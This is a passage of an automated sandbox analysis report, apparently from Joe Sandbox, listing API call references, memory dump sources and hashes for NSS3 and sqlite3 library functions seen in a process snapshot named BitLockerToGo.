                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PR_NewLock.NSS3(?,00000800,6C63EF74,00000000), ref: 6C6A1016
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6487ED,00000008,?,00000800,6C63EF74,00000000), ref: 6C6A102B
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C688FC3
                                                                                                                                                                                                                                                                                                                                                          • PK11_GetIVLength.NSS3(-00000001), ref: 6C688FE0
                                                                                                                                                                                                                                                                                                                                                          • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C76D820,6C689576), ref: 6C688FF9
                                                                                                                                                                                                                                                                                                                                                          • DER_GetInteger_Util.NSS3(?), ref: 6C68901D
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(?), ref: 6C68903E
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C689062
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000024,?,?), ref: 6C6890A2
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(?), ref: 6C6890CA
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000018,?,?), ref: 6C6890F0
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C68912D
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C689136
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C689145
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3626836424-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9b5357d97fb038e5a78cc682d23c079eab4dfb5f14bedd52b86112390a48fb31
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b1a7cd57a3c255848244810de183d1b61aeb66b4668b20c3daf989d02d383f97
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b5357d97fb038e5a78cc682d23c079eab4dfb5f14bedd52b86112390a48fb31
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB5102B2A092009BEB00CF29DC40B9BB7E9EF99358F044529EC5597701E731E945CBEA
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000004,?,6C758061,?,?,?,?), ref: 6C75497D
                                                                                                                                                                                                                                                                                                                                                          • OpenSemaphoreA.KERNEL32(00100002,00000000,?), ref: 6C75499E
                                                                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,6C758061,?,?,?,?), ref: 6C7549AC
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE8C2,0000007B,?,?,6C758061,?,?,?,?), ref: 6C7549C2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000,?,?,6C758061,?,?,?,?), ref: 6C7549D6
                                                                                                                                                                                                                                                                                                                                                          • CreateSemaphoreA.KERNEL32(00000000,6C758061,7FFFFFFF,?), ref: 6C754A19
                                                                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,6C758061,?,?,?,?), ref: 6C754A30
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE8C9,000000B7,?,?,?,?,6C758061,?,?,?,?), ref: 6C754A49
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,6C758061,?,?,?,?), ref: 6C754A52
                                                                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,6C758061,?,?,?,?), ref: 6C754A5A
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?,?,6C758061,?,?,?,?), ref: 6C754A6A
                                                                                                                                                                                                                                                                                                                                                          • CreateSemaphoreA.KERNEL32(?,6C758061,7FFFFFFF,?), ref: 6C754A9A
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,6C758061,?,?,?,?), ref: 6C754AAE
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,6C758061,?,?,?,?), ref: 6C754AC2
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Error$LastSemaphorefree$Create$CloseHandleOpenValuemalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2092618053-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c2de8b6fc1779ad735127e460cecd4d97a8d809f92ebc16f55ca6fff6c94c5f6
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1ae21ba073f77db305b1a7e22536504c91d98a34753956200464e3e98648c794
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2de8b6fc1779ad735127e460cecd4d97a8d809f92ebc16f55ca6fff6c94c5f6
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E341E774B04205AFDF00EFA8CE49B8A7BF8BB4A355F900138E919A7740DF319925C769
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000020), ref: 6C75C8B9
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C75C8DA
                                                                                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000001), ref: 6C75C8E4
                                                                                                                                                                                                                                                                                                                                                          • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C75C8F8
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C75C909
                                                                                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000), ref: 6C75C918
                                                                                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000), ref: 6C75C92A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C630F00: PR_GetPageSize.NSS3(6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000,?,6C5C204A), ref: 6C630F1B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C630F00: PR_NewLogModule.NSS3(clock,6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000,?,6C5C204A), ref: 6C630F25
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C75C947
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Cond$LockModulePageSizecallocfreemallocstrcpystrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2931242645-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C63AF47
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C7090AB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C7090C9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: EnterCriticalSection.KERNEL32 ref: 6C7090E5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C709116
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: LeaveCriticalSection.KERNEL32 ref: 6C70913F
                                                                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 6C63AF6D
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C63AFA4
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C63AFAA
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C63AFB5
                                                                                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C63AFF5
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C63B005
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C63B014
                                                                                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C63B028
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C63B03C
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s decr => %d$Unloaded library %s
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4015679603-2877805755
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C68781D,00000000,6C67BE2C,?,6C686B1D,?,?,?,?,00000000,00000000,6C68781D), ref: 6C686C40
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C68781D,?,6C67BE2C,?), ref: 6C686C58
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C68781D), ref: 6C686C6F
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C686C84
                                                                                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C686C96
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631240: TlsGetValue.KERNEL32(00000040,?,6C63116C,NSPR_LOG_MODULES), ref: 6C631267
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631240: EnterCriticalSection.KERNEL32(?,?,?,6C63116C,NSPR_LOG_MODULES), ref: 6C63127C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C63116C,NSPR_LOG_MODULES), ref: 6C631291
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631240: PR_Unlock.NSS3(?,?,?,?,6C63116C,NSPR_LOG_MODULES), ref: 6C6312A0
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C686CAA
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                                                                                                                                                                                          • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4221828374-3736768024
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2393066f29436eb372306b08d2c21975603272b457f339b39e0d0f7e3e20bb53
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cfd0c420b325da5d22fa1474a96d5f29e583c1bd2ac86f7207150646bc406583
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2393066f29436eb372306b08d2c21975603272b457f339b39e0d0f7e3e20bb53
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5901ADA170331127EE102B7B6E4AF66355C9F4225AF140531FF0AE0A81EFA6EA1580BD
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetErrorText.NSS3(00000000,00000000,?,6C6578F8), ref: 6C694E6D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6309E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C6306A2,00000000,?), ref: 6C6309F8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6309E0: malloc.MOZGLUE(0000001F), ref: 6C630A18
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6309E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C630A33
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C6578F8), ref: 6C694ED9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C687703,?,00000000,00000000), ref: 6C685942
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C687703), ref: 6C685954
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C68596A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C685984
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C685999
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: free.MOZGLUE(00000000), ref: 6C6859BA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C6859D3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: free.MOZGLUE(00000000), ref: 6C6859F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C685A0A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: free.MOZGLUE(00000000), ref: 6C685A2E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C685A43
                                                                                                                                                                                                                                                                                                                                                          • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C694EB3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C694820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C694EB8,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C69484C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C694820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C694EB8,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C69486D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C694820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C694EB8,?), ref: 6C694884
                                                                                                                                                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C694EC0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C694470: TlsGetValue.KERNEL32(00000000,?,6C657296,00000000), ref: 6C694487
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C694470: EnterCriticalSection.KERNEL32(?,?,?,6C657296,00000000), ref: 6C6944A0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C694470: PR_Unlock.NSS3(?,?,?,?,6C657296,00000000), ref: 6C6944BB
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C694F16
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C694F2E
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C694F40
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C694F6C
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C694F80
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C694F8F
                                                                                                                                                                                                                                                                                                                                                          • PK11_UpdateSlotAttribute.NSS3(?,6C76DCB0,00000000), ref: 6C694FFE
                                                                                                                                                                                                                                                                                                                                                          • PK11_UserDisableSlot.NSS3(0000001E), ref: 6C69501F
                                                                                                                                                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C69506B
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 560490210-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 591234aeeb71a7725d85b0a0a89bd34064f43f4fb371b08eb235038c33b68e95
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4a2e14664d698cc72935207e6d96659c0daa9f32e9b67013db67610d70253acf
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 591234aeeb71a7725d85b0a0a89bd34064f43f4fb371b08eb235038c33b68e95
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF51F3B19012039FEB019F64EC05AAB36B4FF0635DF140635EC1A86A11FB31D955CBAA
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 786543732-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_text16.NSS3(?), ref: 6C714CAF
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C714CFD
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_text16.NSS3(?), ref: 6C714D44
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2274617401-4033235608
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6448A2
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C6448C4
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,000000BC), ref: 6C6448D8
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000004,00000000,000000B8), ref: 6C6448FB
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000018), ref: 6C644908
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C644947
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C64496C
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C644988
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C768DAC,?), ref: 6C6449DE
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6449FD
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C644ACB
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Alloc_ArenaError$Arena_Item_$CopyDecodeFreeQuickmemset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4201528089-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C712D9F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5CCA30: EnterCriticalSection.KERNEL32(?,?,?,6C62F9C9,?,6C62F4DA,6C62F9C9,?,?,6C5F369A), ref: 6C5CCA7A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5CCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C5CCB26
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_exec.NSS3(?,?,6C712F70,?,?), ref: 6C712DF9
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C712E2C
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C712E3A
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C712E52
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(6C77AAF9,?), ref: 6C712E62
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C712E70
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C712E89
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C712EBB
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C712ECB
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C712F3E
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C712F4C
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1957633107-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2120,Function_00097E60,?,?,?,?,?,6C6CF9CF,6C6CFAD0,00000000), ref: 6C657C81
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: TlsGetValue.KERNEL32(?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4C97
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4CB0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: PR_Unlock.NSS3(?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4CC9
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C657CA0
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C657CB4
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C657CCF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: TlsGetValue.KERNEL32 ref: 6C6EDD8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C657D04
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C657D1B
                                                                                                                                                                                                                                                                                                                                                          • realloc.MOZGLUE(-00000050), ref: 6C657D82
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C657DF4
